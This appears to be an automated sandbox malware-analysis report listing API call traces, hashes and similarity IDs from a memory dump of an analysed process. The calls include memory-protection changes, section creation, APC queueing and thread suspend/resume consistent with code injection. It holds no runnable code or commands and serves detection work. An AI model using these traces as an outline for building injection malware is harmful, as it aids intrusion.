                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA699E
                                                            • RtlDeleteCriticalSection.NTDLL(04BCC2E0), ref: 04BA69D1
                                                            • RtlDeleteCriticalSection.NTDLL(04BCC300), ref: 04BA69D8
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A07
                                                            • ReleaseMutex.KERNEL32(00000428,00000000,?,?,?,04BC3A85), ref: 04BA6A18
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A24
                                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BC3A85), ref: 04BA6A30
                                                            • CloseHandle.KERNEL32(?,?,04BC3A85), ref: 04BA6A3C
                                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BC3A85), ref: 04BA6A42
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6A56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BC3A85), ref: 04BA6A79
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BA6AB2
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04BC3A85), ref: 04BA6ACE
                                                            • CloseHandle.KERNEL32(05C88558,?,?,04BC3A85), ref: 04BA6AF5
                                                            • LocalFree.KERNEL32(?,?,04BC3A85), ref: 04BA6B05
                                                              • Part of subcall function 04BAFBEE: GetVersion.KERNEL32(?,00000000,73BCF720,?,04BA698F,00000000,?,?,?,04BC3A85), ref: 04BAFC12
                                                              • Part of subcall function 04BAFBEE: GetModuleHandleA.KERNEL32(?,05C89759,?,04BA698F,00000000,?,?,?,04BC3A85), ref: 04BAFC2F
                                                              • Part of subcall function 04BAFBEE: GetProcAddress.KERNEL32(00000000), ref: 04BAFC36
                                                              • Part of subcall function 04BACFBA: RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BACFC4
                                                              • Part of subcall function 04BACFBA: RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BAD000
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                            • String ID:
                                                            • API String ID: 1924086638-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25C4
                                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25D6
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BA25E5
                                                            • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA25F6
                                                            • VirtualProtect.KERNEL32(?,00000005,00000040,00000400,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA262C
                                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA2647
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA265C
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,04BC84F0,00000018,04BAA14E,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000), ref: 04BA2689
                                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA26A3
                                                            • GetLastError.KERNEL32(?,00000000,?,04BB8E6F,00000000,00000001,?,00000000,00000000,00000000,04BCB928,00000001), ref: 04BA26AA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3676034644-0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA92F3: GetProcAddress.KERNEL32(?,00000318), ref: 04BA9318
                                                              • Part of subcall function 04BA92F3: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BA9334
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB987
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BBBA72
                                                              • Part of subcall function 04BA92F3: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BA949E
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BBB9BD
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BBB9C9
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA06
                                                            • StrChrA.SHLWAPI(?,0000002E), ref: 04BBBA0F
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 04BBBA21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                            • String ID:
                                                            • API String ID: 3901270786-0
                                                            • Opcode ID: 235d8f35be2b4aa0eca807b3df263cd7a689183fea5bcb419be503c87250f951
                                                            • Instruction ID: 0ca46b8dc9ced342725b4205d2505f89a875ce7a1d4758d57da0058d2fb992eb
                                                            • Opcode Fuzzy Hash: 235d8f35be2b4aa0eca807b3df263cd7a689183fea5bcb419be503c87250f951
                                                            • Instruction Fuzzy Hash: F3316271508311ABD321CF15C840BABBBE8FF89B55F000959F8C567641DB74F905CBA6
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BBAB41: memset.NTDLL ref: 04BBAB4B
                                                            • OpenEventA.KERNEL32(00000002,00000000,04BCC1E4,?,00000000,00000000,?,04BB22F6), ref: 04BC0555
                                                            • SetEvent.KERNEL32(00000000,?,04BB22F6), ref: 04BC0562
                                                            • Sleep.KERNEL32(00000BB8,?,04BB22F6), ref: 04BC056D
                                                            • ResetEvent.KERNEL32(00000000,?,04BB22F6), ref: 04BC0574
                                                            • CloseHandle.KERNEL32(00000000,?,04BB22F6), ref: 04BC057B
                                                            • GetShellWindow.USER32 ref: 04BC0586
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 04BC058D
                                                              • Part of subcall function 04BC1C1F: RegCloseKey.ADVAPI32(?), ref: 04BC1CA2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                            • String ID:
                                                            • API String ID: 53838381-0
                                                            • Opcode ID: 745646c6f4963bca5d3a3bdea2c705359662fb41f48801fdd2fb89d5a2c2bed5
                                                            • Instruction ID: c9dd1918d106cfa1c7256a3fd83396f27789de9bd7775dc3756f91bbafe12128
                                                            • Opcode Fuzzy Hash: 745646c6f4963bca5d3a3bdea2c705359662fb41f48801fdd2fb89d5a2c2bed5
                                                            • Instruction Fuzzy Hash: 1B218E72600110AFD2206AA6ECC9E6B7B6DEB8E615B10418AF65AD7140DB38AC109BB1
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BB94B9
                                                              • Part of subcall function 04BB527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB529A
                                                              • Part of subcall function 04BB527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52AB
                                                              • Part of subcall function 04BB527F: CloseHandle.KERNEL32(00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52BE
                                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 04BB9573
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04BB9581
                                                            • SuspendThread.KERNEL32(?), ref: 04BB9594
                                                              • Part of subcall function 04BB969C: memset.NTDLL ref: 04BB995D
                                                            • ResumeThread.KERNEL32(?), ref: 04BB9617
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                            • String ID:
                                                            • API String ID: 568453049-0
                                                            • Opcode ID: f3cf74557be90be90e72d0774a7ca6a0e60d7c2c2b462579489a54003d6fc796
                                                            • Instruction ID: 057d3d097bf62e72ca9d9805ae467fb44001bbb9fef84ecd95eb63bb533060d2
                                                            • Opcode Fuzzy Hash: f3cf74557be90be90e72d0774a7ca6a0e60d7c2c2b462579489a54003d6fc796
                                                            • Instruction Fuzzy Hash: A2415FB1900208AFEF219F64CCC4EFE7BB9EF04354F1444A6EA8696150D7B5EE51DBA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(04BBC495,?,?,00000402,04BBC495,04BC8570,00000018,04BAA0D1,?,00000402,04BCB7A4,04BCB7A0,-0000000C,00000000), ref: 04BBA792
                                                            • VirtualProtect.KERNEL32(00000000,00000004,04BBC495,04BBC495,00000000,00000004,04BBC495,04BCB7A4,04BBC495,?,?,00000402,04BBC495,04BC8570,00000018,04BAA0D1), ref: 04BBA81D
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BBA845
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BBA863
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                            • String ID:
                                                            • API String ID: 3666628472-0
                                                            • Opcode ID: 0f28974e5ac4ae297e7e2a9a4fe31ee884ea5fd3cdcc3653b60fcaf579fbac1c
                                                            • Instruction ID: 6cac88ce93d5fb716399686d0502c4c6cba4d7f778c8dbc4b31eb29d0e363381
                                                            • Opcode Fuzzy Hash: 0f28974e5ac4ae297e7e2a9a4fe31ee884ea5fd3cdcc3653b60fcaf579fbac1c
                                                            • Instruction Fuzzy Hash: 76415B70D00615EFDB11DFA5C884AADBBF4FF48340B10859AE895EB260D7B4BA51CFA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BB97AB,?,?,?,00000000,00000000), ref: 04BAF7D4
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF7F6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF80C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF822
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF838
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BAF84E
                                                              • Part of subcall function 04BBA21F: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 04BBA27C
                                                              • Part of subcall function 04BBA21F: memset.NTDLL ref: 04BBA2A0
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 3012371009-0
                                                            • Opcode ID: ed09118bd6fb98fcd5eeb1d04edaa790bf96ff5aef0f7fd0e664632b58aad680
                                                            • Instruction ID: 12967e28b4ac882fbb7ce64de1237ad9e6fb0da9eeabe8574eb8b23a5a2b8632
                                                            • Opcode Fuzzy Hash: ed09118bd6fb98fcd5eeb1d04edaa790bf96ff5aef0f7fd0e664632b58aad680
                                                            • Instruction Fuzzy Hash: BB218DB1A0030ADFDB50DF69C8C0EAA7BFCEB0D384B058566E549C7211E774E9148B71
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,04BC0483), ref: 04BAE109
                                                            • QueueUserAPC.KERNEL32(?,00000000,04BB5ADA,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE11E
                                                            • GetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE129
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE133
                                                            • CloseHandle.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE13A
                                                            • SetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE143
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 3832013932-0
                                                            • Opcode ID: 52b8b3fa0b3e193a08f9d78fa87a53e8840ca06f73ff0e64f440e586f8c7100a
                                                            • Instruction ID: f23ecc8aa1b0138c12ce6530889be036e35b904dc49b996259d03f2f9489a157
                                                            • Opcode Fuzzy Hash: 52b8b3fa0b3e193a08f9d78fa87a53e8840ca06f73ff0e64f440e586f8c7100a
                                                            • Instruction Fuzzy Hash: 01F0F872645621ABD7221BA1ECC8F5ABFA9FF0C753F054416F606A2150D7299C208BB5
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC21CB: VirtualProtect.KERNEL32(04BBC495,?,00000040,?,04BCB7A4,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000), ref: 04BC21F0
                                                              • Part of subcall function 04BC21CB: GetLastError.KERNEL32(?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC21F8
                                                              • Part of subcall function 04BC21CB: VirtualQuery.KERNEL32(04BBC495,04BCB7A4,0000001C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC220F
                                                              • Part of subcall function 04BC21CB: VirtualProtect.KERNEL32(04BBC495,?,-2C9B417C,?,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC2234
                                                            • GetLastError.KERNEL32(00000000,00000004,04BAA09A,?,810C74FC,00000000,?,04BC8560,0000001C,04BA9E36,00000002,04BBC495,00000001,0000000C,04BCB7A0,0000000C), ref: 04BB05C5
                                                              • Part of subcall function 04BAFB2B: lstrlen.KERNEL32(04BCB620,04BCB7A4,00000402,04BCB7A4), ref: 04BAFB63
                                                              • Part of subcall function 04BAFB2B: lstrcpy.KERNEL32(00000000,04BCB620), ref: 04BAFB7A
                                                              • Part of subcall function 04BAFB2B: StrChrA.SHLWAPI(00000000,0000002E), ref: 04BAFB83
                                                              • Part of subcall function 04BAFB2B: GetModuleHandleA.KERNEL32(00000000), ref: 04BAFBA1
                                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,04BBC495,?,04BCB620,04BBC495,?,00000000,00000004,04BAA09A,?,810C74FC), ref: 04BB0543
                                                            • VirtualProtect.KERNEL32(04BCB7A4,00000004,04BAA09A,04BAA09A,04BBC495,?,00000000,00000004,04BAA09A,?,810C74FC,00000000,?,04BC8560,0000001C,04BA9E36), ref: 04BB055E
                                                            • RtlEnterCriticalSection.NTDLL(04BCC300), ref: 04BB0582
                                                            • RtlLeaveCriticalSection.NTDLL(04BCC300), ref: 04BB05A0
                                                              • Part of subcall function 04BC21CB: SetLastError.KERNEL32(0000000C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC223D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 899430048-0
                                                            • Opcode ID: 2986f9a0c0670a695ab8b63f132abffd5a86f16caaf50850d0a52c1081caccaf
                                                            • Instruction ID: c9da94f422e984c5186ee00aae3674f99b22b03a517e6c674e8489943864a5b6
                                                            • Opcode Fuzzy Hash: 2986f9a0c0670a695ab8b63f132abffd5a86f16caaf50850d0a52c1081caccaf
                                                            • Instruction Fuzzy Hash: AD413CB1900619AFDB10EF65C885AFEBBB4FF09310F008199E959AB650D774E950CFA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC1736: RegCreateKeyA.ADVAPI32(80000001,05C8A7F0,?), ref: 04BC174B
                                                              • Part of subcall function 04BC1736: lstrlen.KERNEL32(05C8A7F0,00000000,00000000,00000000,?,04BB68CE,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?,04BB5AB0), ref: 04BC1774
                                                            • RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                            • RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                            • HeapFree.KERNEL32(00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6934
                                                            • RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                            • String ID:
                                                            • API String ID: 1633053242-0
                                                            • Opcode ID: 4792e4b613b865e86f83fd6bb6ededed5c962bacfa6ca0005d13e066f664c039
                                                            • Instruction ID: ccfbb25eec09c15e8dba4c34f3ee1401015d9870d20afdf0995a608795cb2967
                                                            • Opcode Fuzzy Hash: 4792e4b613b865e86f83fd6bb6ededed5c962bacfa6ca0005d13e066f664c039
                                                            • Instruction Fuzzy Hash: B81146B2200109FFDB019FA4DCC4CEE7BBEFB9C254B11046AF945A3210E671AE519BA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNEL32(04BBC495,?,00000040,?,04BCB7A4,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000), ref: 04BC21F0
                                                            • GetLastError.KERNEL32(?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC21F8
                                                            • VirtualQuery.KERNEL32(04BBC495,04BCB7A4,0000001C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC220F
                                                            • VirtualProtect.KERNEL32(04BBC495,?,-2C9B417C,?,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC2234
                                                            • SetLastError.KERNEL32(0000000C,?,00000000,04BCB7A4,04BCB7A0,-0000000C,00000000,?,?,04BBC495,0000000C,00000000,?), ref: 04BC223D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$ErrorLastProtect$Query
                                                            • String ID:
                                                            • API String ID: 148356745-0
                                                            • Opcode ID: b8abbdd85196e274176c6855622456bb8cfa86a148fad57c867a5aa1f6465851
                                                            • Instruction ID: e01b0164cb915d7b233d07dafff80c11ef98e7e6e7a27850201b094d250a1faf
                                                            • Opcode Fuzzy Hash: b8abbdd85196e274176c6855622456bb8cfa86a148fad57c867a5aa1f6465851
                                                            • Instruction Fuzzy Hash: 4A010C72900209EF9F119F95DC84D9ABBBDFF1C2557044466F901D7120D771EA24DB60
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BA1971
                                                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04BA19FB
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04BA1A09
                                                            • SuspendThread.KERNEL32(?), ref: 04BA1A1C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                            • String ID:
                                                            • API String ID: 3168247402-0
                                                            • Opcode ID: 01965236894a0f425c2f742f98c78b0938ea58d85c02edfd887f08a2252494c7
                                                            • Instruction ID: 7a390d6238e5b4aa02c219b9e64042500e2a7e31c39476efbcaae67f5030d740
                                                            • Opcode Fuzzy Hash: 01965236894a0f425c2f742f98c78b0938ea58d85c02edfd887f08a2252494c7
                                                            • Instruction Fuzzy Hash: 95415EB1108301AFE761DF54C880D7BBBE9FF88354F044A6DF6A492160D731E965CB62
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegQueryValueExA.KERNEL32(04BB22F6,?,00000000,04BB22F6,00000000,04BB2306,04BB22F6,?,?,?,?,04BBABF7,80000001,?,04BB22F6,04BB2306), ref: 04BBDAE7
                                                            • RtlAllocateHeap.NTDLL(00000000,04BB2306,00000000), ref: 04BBDAFE
                                                            • HeapFree.KERNEL32(00000000,00000000,?,04BBABF7,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001,?,04BB22F6), ref: 04BBDB19
                                                            • RegQueryValueExA.KERNEL32(04BB22F6,?,00000000,04BB22F6,00000000,04BB2306,?,04BBABF7,80000001,?,04BB22F6,04BB2306,?,04BBAB63,80000001), ref: 04BBDB38
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateFree
                                                            • String ID:
                                                            • API String ID: 4267586637-0
                                                            • Opcode ID: 432ecbfa422b4c05982735910dd3cfa5d19e35ede9fd97f2cda2031c86ebdb3c
                                                            • Instruction ID: 8b5386bea517a9d1ca6e77b094b102e36763092b070fb18faea44c0544eaaded
                                                            • Opcode Fuzzy Hash: 432ecbfa422b4c05982735910dd3cfa5d19e35ede9fd97f2cda2031c86ebdb3c
                                                            • Instruction Fuzzy Hash: 2D111F76500118FFDB22DF95DC84DEEBBBDEB8D750B104096F941A7210D2B5AE41DBA0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC606
                                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04BCC140,00000000,04BAAD03,?,04BAD280,?), ref: 04BAC611
                                                            • _wcsupr.NTDLL ref: 04BAC61E
                                                            • lstrlenW.KERNEL32(00000000), ref: 04BAC626
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 2533608484-0
                                                            • Opcode ID: 85cc5beeaea4c129a33922f67a89eb68be3947c3d7993cc022f536da9822427d
                                                            • Instruction ID: 02b63e7cc46606f9b447fd18e7b436d24d993c3445b3ed3a3e90dcf7c83749d8
                                                            • Opcode Fuzzy Hash: 85cc5beeaea4c129a33922f67a89eb68be3947c3d7993cc022f536da9822427d
                                                            • Instruction Fuzzy Hash: B8F0E9311092105FA312AF3D9ECCEBF6ABDEF84B65B14146AF845D3140CE58EC1181B4
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAD19D
                                                              • Part of subcall function 04BB00CA: RtlEnterCriticalSection.NTDLL(00000000), ref: 04BB00D6
                                                              • Part of subcall function 04BB00CA: CloseHandle.KERNEL32(?), ref: 04BB00E4
                                                              • Part of subcall function 04BB00CA: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BB0100
                                                            • CloseHandle.KERNEL32(?), ref: 04BAD1AB
                                                            • InterlockedDecrement.KERNEL32(04BCBFFC), ref: 04BAD1BA
                                                              • Part of subcall function 04BC3A70: SetEvent.KERNEL32(00000404,04BAD1D5), ref: 04BC3A7A
                                                              • Part of subcall function 04BC3A70: CloseHandle.KERNEL32(00000404), ref: 04BC3A8F
                                                              • Part of subcall function 04BC3A70: HeapDestroy.KERNELBASE(05890000), ref: 04BC3A9F
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 04BAD1D6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                            • String ID:
                                                            • API String ID: 1141245775-0
                                                            • Opcode ID: d24439e9456d61b7a12231083a301f1fba6721ad2d0dbb0a8c77a36a8955658d
                                                            • Instruction ID: b8d94077ea1ebef6bda012576c5f71bdab04bfc3874278ee3b74817c61e043d4
                                                            • Opcode Fuzzy Hash: d24439e9456d61b7a12231083a301f1fba6721ad2d0dbb0a8c77a36a8955658d
                                                            • Instruction Fuzzy Hash: 24F0A4315002046FD7019B7ACC89E6A3B78FB4A730B100299F526A32C0DB74AC128B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BB764F
                                                            • memcpy.NTDLL ref: 04BB7677
                                                              • Part of subcall function 04BA4173: NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                              • Part of subcall function 04BA4173: RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                              • Part of subcall function 04BA4173: SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            • GetLastError.KERNEL32(00000010,00000218,04BC4EAD,00000100,?,00000318,00000008), ref: 04BB768E
                                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04BC4EAD,00000100), ref: 04BB7771
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                            • String ID:
                                                            • API String ID: 685050087-0
                                                            • Opcode ID: 4e9cfee232f05dd57bc6769b2cfd660655028d7801d4d310407070310b415dfd
                                                            • Instruction ID: c2c8af73834ff27b90d193cb1587d15e62cfdd29fc5a4f7a8b16941d22a4f29a
                                                            • Opcode Fuzzy Hash: 4e9cfee232f05dd57bc6769b2cfd660655028d7801d4d310407070310b415dfd
                                                            • Instruction Fuzzy Hash: A04183B1504301AFD720DF29DD81FABBBF9EB88314F00496DF999C6250EB70E5148BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
